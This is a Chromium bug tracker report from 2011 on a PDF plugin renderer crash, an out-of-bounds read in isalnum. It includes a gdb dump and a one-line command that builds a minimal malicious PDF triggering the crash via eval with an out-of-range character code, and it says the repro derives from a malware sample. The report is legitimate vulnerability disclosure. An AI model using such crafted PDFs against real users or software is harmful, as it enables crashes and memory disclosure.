Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner:
Email to this user bounced
Closed: Oct 2011
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Renderer crash with PDF at isalnum
Reported by aohe...@gmail.com, Oct 2 2011 Back to list
VULNERABILITY DETAILS
Opening the attached PDF document causes a renderer crash due to invalid read at isalnum with an addresses like 0xffffffff800acf66.

VERSION
Chrome Version: 14.0.835.186 stable (also beta and dev)
Operating System: Linux, Debian 6.0.2 (32- and 64-bit)

REPRODUCTION CASE
Note: the repro is derived from a malware sample.

 $ google-chrome isalnum.pdf

The repro still has a compressed section of JS, which in the original file contains a large array followed by some deobfuscation code. Based on the crash location I'd guess it happens after decompression while parsing or running the JS, but I haven't yet been able to decompress the stream and have a look at what is happening. The original JS stream does not cause this.

I'll try to minimize the repro further later today.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: 
Program received signal SIGSEGV, Segmentation fault.
0x00007fffee977773 in isalnum () from /lib/libc.so.6
(gdb) x/3i $rip
=> 0x7fffee977773 <isalnum+19>: movzwl (%rax,%rdi,2),%eax
   0x7fffee977777 <isalnum+23>: and    $0x8,%eax
   0x7fffee97777a <isalnum+26>: retq   
(gdb) i r
rax            0x7ffff466c82c   140737293764652
rbx            0x7fffffffb6e0   140737488336608
rcx            0x9e     158
rdx            0xffffffffffffff80       -128
rsi            0x7fffffffb720   140737488336672
rdi            0xffffffffbe021b9d       -1107158115
rbp            0x7fffffffb720   0x7fffffffb720
rsp            0x7fffffffb338   0x7fffffffb338
r8             0x8      8
r9             0x101010101010101        72340172838076673
r10            0x3900000055     244813135957
r11            0x7fffee9ca42a   140737196631082
r12            0xbe021b9d       3187809181
r13            0x7fffea0b7cbc   140737120009404
r14            0x7fffe6f00b60   140737067879264
r15            0x73     115
rip            0x7fffee977773   0x7fffee977773 <isalnum+19>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) bt 10
#0  0x00007fffee977773 in isalnum () from /lib/libc.so.6
#1  0x00007fffe9efab95 in ?? () from /opt/google/chrome/libpdf.so
#2  0x00007fffe9efb5e9 in ?? () from /opt/google/chrome/libpdf.so
#3  0x00007fffe9ee01c6 in ?? () from /opt/google/chrome/libpdf.so
#4  0x00007fffe9edef83 in ?? () from /opt/google/chrome/libpdf.so
#5  0x00007fffe9edf0a8 in ?? () from /opt/google/chrome/libpdf.so
#6  0x00007fffe9edf188 in ?? () from /opt/google/chrome/libpdf.so
#7  0x00007fffe9edf293 in ?? () from /opt/google/chrome/libpdf.so
#8  0x00007fffe9edf483 in ?? () from /opt/google/chrome/libpdf.so
#9  0x00007fffe9edf5c3 in ?? () from /opt/google/chrome/libpdf.so
(More stack frames follow...)
 
isalnum.pdf
5.5 KB Download
Comment 1 by cdn@chromium.org, Oct 3 2011
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Feature-PDF SecSeverity-High OS-All Mstone-14
Status: Available
Labels: -Mstone-14 Mstone-15
Owner: cevans@chromium.org
Status: Assigned
I'll deal with this when I get back (next week). Aki, awesome if you can a minimized repro by then.
Comment 3 by aohe...@gmail.com, Oct 10 2011
I some progress. The crash occurs when eval() is given bad data under a few layers of obfuscation. There is a code point 7039 in the argument string, which is somehow different from a visually indistinguishable string constructed with String.fromCharCode. I'll post a better repro a bit later.
Comment 4 by aohe...@gmail.com, Oct 10 2011
Got it: 
 $ echo "%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (eval(String.fromCharCode(97,99999999)))>> trailer<</Root 1 0 R>>" > repro.pdf;
 $ google-chrome repro.pdf

Crash moves with the high code point.
repro.pdf
141 bytes View Download
Nice Aki, thanks! I was planning to tackle this today, too, so good timing.
Labels: -SecSeverity-High SecSeverity-Medium
Status: Started
OOB read due to failure to honor the contract of isalnum:
---
The c argument is an int, the value of which the application shall ensure is representable as an unsigned char or equal to the value of the macro EOF. If the argument has any other value, the behavior is undefined.
---

glibc takes the liberty of crashing for its particular view of "undefined", which it is of course permitted to do.
Labels: -Restrict-View-SecurityTeam -Mstone-15 Restrict-View-SecurityNotify Mstone-16 SecImpacts-Stable SecImpacts-Beta reward-topanel
Status: FixUnreleased
Safest to let this one roll into M16, I think.
r1140 on PDF trunk.
Labels: -reward-topanel reward-500 reward-unpaid
@aohelin: interesting bug. It's hard to rule out a bitwise recovery of the OOB content, hence a $500 Chromium Security Reward :D

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Comment 10 by aohe...@gmail.com, Dec 11 2011
@scarybeasts excellent :)
Labels: -reward-unpaid
Payment in system.
Comment 12 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Cc: emily.zh...@gmail.com
Project Member Comment 14 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 15 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-Internals -Feature-PDF -SecSeverity-Medium -Mstone-16 -SecImpacts-Stable -SecImpacts-Beta Cr-Content-Plugins-PDF Security-Impact-Beta Security-Severity-Medium Cr-Internals Security-Impact-Stable Type-Bug-Security M-16
Project Member Comment 16 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 17 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 19 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 20 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium Security_Severity-Medium
Project Member Comment 21 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 22 by bugdroid1@chromium.org, Apr 6 2013
Labels: Cr-Blink
Project Member Comment 23 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content-Plugins-PDF Cr-Internals-Plugins-PDF
Project Member Comment 24 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 25 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 26 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment